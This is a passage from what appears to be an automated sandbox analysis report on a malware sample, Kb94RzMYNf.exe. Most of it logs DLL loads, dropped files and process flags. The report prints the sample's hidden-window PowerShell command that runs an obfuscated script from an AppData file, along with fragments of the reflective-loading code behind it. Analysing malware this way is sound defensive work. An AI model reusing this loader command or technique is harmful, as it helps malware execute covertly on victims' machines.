Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Kb94RzMYNf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Edental $Ksemaforen $Overmellowly), (Jyskhedens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preincline = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bevrtendes)), $Kantebaand).DefineDynamicModule($Hoejadel, $false).DefineType($Scenegulvene, $Skattepligtig185, [System.MulticastDelega

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E891E pushad ; iretd	5_2_000E891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E8C2F pushfd ; iretd	5_2_000E8C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E2D49 push 8BFFFFFFh; retf	5_2_000E2D4F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E8DDF push esp; iretd	5_2_000E8DE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	File created: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
